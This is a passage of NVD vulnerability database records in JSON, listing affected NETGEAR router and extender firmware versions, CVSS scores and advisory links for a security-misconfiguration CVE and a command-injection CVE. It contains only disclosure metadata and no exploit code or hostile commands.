"versionEndExcluding": "1.0.2.104",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EEFCBDB9-47D0-40EF-9428-FF714763BC12",
"versionEndExcluding": "1.0.3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2000rpt_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "058BC554-8E48-460E-A305-B5CDA8249B28",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2000rpt:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "6FB1BE0D-E3CF-4C16-8C11-706B238E9934",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07CEF0FF-41A1-485B-8CDA-DB7AE8ECDB69",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AAFDAF9A-711E-497F-8632-0345B635A7C9",
"versionEndExcluding": "1.0.2.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "AB71AC74-2D1B-4F1E-A70F-6590A00AAD9E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3100rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8DB649EB-E2F9-4E11-B68A-50B0096AF9B6",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3100rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4D8680F5-0C06-4CFC-8BA0-CF85D0438419",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF8551B9-72D9-46B8-9F66-EE7841E29A26",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FAF6A089-4E7D-43D1-AF1F-01A7A592115E",
"versionEndExcluding": "1.0.2.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "832B6460-9984-4441-8E06-F784052FC8CC",
"versionEndExcluding": "1.1.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF96C0EB-8CB6-4C86-A9A2-A4C7AF58C97F",
"versionEndExcluding": "1.0.2.98",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1413C591-D066-4FA2-BEB1-6C60F8645F28",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B1EBB8F-818F-4E04-BB25-A81C1C309CD0",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9591B73B-93BF-4976-998B-0200C990EF6A",
"versionEndExcluding": "1.0.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6880E178-51E5-47DD-8DE6-59EFDAE4FA0C",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "124ABC0A-DD68-4540-AAC2-C4E87CDC91A7",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4130E37C-5B30-46E5-90B0-A7D5E163DF02",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C4DA2EE-628D-4F25-9B7E-0F77762139B0",
"versionEndExcluding": "1.1.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9877579C-D214-4605-93AA-2B78914CF33C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1.78, JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una configuraci\u00f3n incorrecta de los ajustes de seguridad. Esto afecta a D1500 versiones anteriores a 1.0.0.27, D500 versiones anteriores a 1.0.0.27, D6100 versiones anteriores a 1.0.0.57, D6220 versiones anteriores a 1.0.0.40, D6400 versiones anteriores a 1.0.0.74, D7000 versiones anteriores a 1.0.1.60, D7800 versiones anteriores a 1.0.1.34, D8500 versiones anteriores a 1.0.3.39, DGN2200v4 versiones anteriores a 1.0.0.94, DGN2200Bv4 versiones anteriores a 1.0.0.94, EX2700 versiones anteriores a 1.0.1.42, EX3700 versiones anteriores a 1.0.0.64, EX3800 versiones anteriores a 1.0.0.64, EX6000 versiones anteriores a 1.0.0.24, EX6100 versiones anteriores a 1.0.2.18, EX6120 versiones anteriores a 1.0.0.32, EX6130 versiones anteriores a 1.0.0.22, EX6150 versiones anteriores a 1.0.0.34_1.0.70, EX6200 versiones anteriores a 1.0.3.82_1.1.117, EX6400 versiones anteriores a 1.0.1.78, EX7000 versiones anteriores a 1.0.0.56, EX7300 versiones anteriores a 1.0.1.78, JNR1010v2 versiones anteriores a 1.1.0.42, JR6150 versiones anteriores a 1.0. 1.10, JWNR2010v5 versiones anteriores a 1.1.0.42, PR2000 versiones anteriores a 1.0.0.22, R6050 versiones anteriores a 1.0.1.10, R6100 versiones anteriores a 1.0.1.16, R6220 versiones anteriores a 1.1.0.50, R6250 versiones anteriores a 1.0.4.14, R6300v2 versiones anteriores a 1.0.4.12, R6400v2 versiones anteriores a 1.0.2.34, R6700 versiones anteriores a 1.0.1.26, R6900 versiones anteriores a 1.0.1.26, R6900P versiones anteriores a 1.2.0.22, R7000 versiones anteriores a 1.0.9.6, R7000P versiones anteriores a 1.2.0.22, R7100LG versiones anteriores a 1.0.0.40, R7300DST versiones anteriores a 1.0.0.54, R7500 versiones anteriores a 1.0.0.110, R7500v2 versiones anteriores a 1.0.3.26, R7800 versiones anteriores a 1.0.2.44, R7900 versiones anteriores a 1.0.1.26, R8000 versiones anteriores a 1.0.3.48, R8300 versiones anteriores a 1.0.2.104, R8500 versiones anteriores a 1.0.2.104, R9000 versiones anteriores a 1.0.3.10, WN2000RPTv3 versiones anteriores a 1.0.1.26, WN2500RPv2 versiones anteriores a 1.0 .1.46, WN3000RPv3 versiones anteriores a 1.0.2.66, WN3100RPv2 versiones anteriores a 1.0.0.56, WNDR3400v3 versiones anteriores a 1.0.1.14, WNDR3700v4 versiones anteriores a 1.0.2.96, WNDR3700v5 versiones anteriores a 1.1.0.54, WNDR4300 versiones anteriores a 1.0.2.98, WNDR4300v2 versiones anteriores a 1.0.0.48, WNDR4500v3 versiones anteriores a 1.0.0.48, WNR1000v4 versiones anteriores a 1.1.0.42, WNR2000v5 versiones anteriores a 1.0.0.64, WNR2020 versiones anteriores a 1.1.0.42 y WNR2050 versiones anteriores a 1.1.0.42."
}
],
"id": "CVE-2018-21231",
"lastModified": "2024-11-21T04:03:14.407",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.1,
"impactScore": 2.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-24T15:15:13.003",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000055103/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0102"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 20:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.40, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.20, R6300v2 before 1.0.4.24, R6400 before 1.0.1.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.48.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "061389AF-C8DA-48DF-8D7E-014A9B8D5D09",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72004304-314A-4BE6-A33E-7F4CDF01FCEF",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AE696277-6FBD-4345-B372-FA375B0F763B",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "746ADED9-4517-4482-AAEF-ACD301B433F8",
"versionEndExcluding": "1.0.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "06C765FD-E0A0-4401-9C6F-5F3C7EF98A52",
"versionEndExcluding": "1.0.4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "110B10A0-1969-4FDE-9289-6EAB81D1657B",
"versionEndExcluding": "1.0.4.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "97DE1C91-59A0-4902-B5C7-0CFD2631CAEE",
"versionEndExcluding": "1.0.1.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDC0DA75-5EB9-4F53-99A9-798FFBFD0C15",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
